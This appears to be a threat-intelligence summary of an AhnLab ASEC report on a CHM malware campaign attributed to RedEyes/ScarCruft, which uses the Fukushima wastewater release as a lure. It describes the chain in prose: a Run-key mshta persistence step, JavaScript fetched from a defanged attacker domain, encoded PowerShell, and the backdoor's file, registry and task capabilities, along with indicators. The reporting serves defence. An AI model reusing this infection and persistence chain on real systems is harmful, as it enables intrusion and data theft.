AhnLab ASEC reported renewed CHM malware distribution assessed as likely RedEyes/ScarCruft activity, using Korean interest in the Fukushima wastewater release as the lure. The CHM file registers an mshta command under the HKCU Run key, then retrieves JavaScript from navercorp[.]ru to execute encoded PowerShell. The decoded backdoor maintains persistence, polls com.php with the victim computer and user name, and can upload or download files, enumerate file metadata, modify the registry, schedule tasks, rename files, and delete data. ASEC linked the command structure to earlier RedEyes CHM and M2RAT activity and listed Downloader/CHM.Generic plus the navercorp[.]ru URLs as indicators.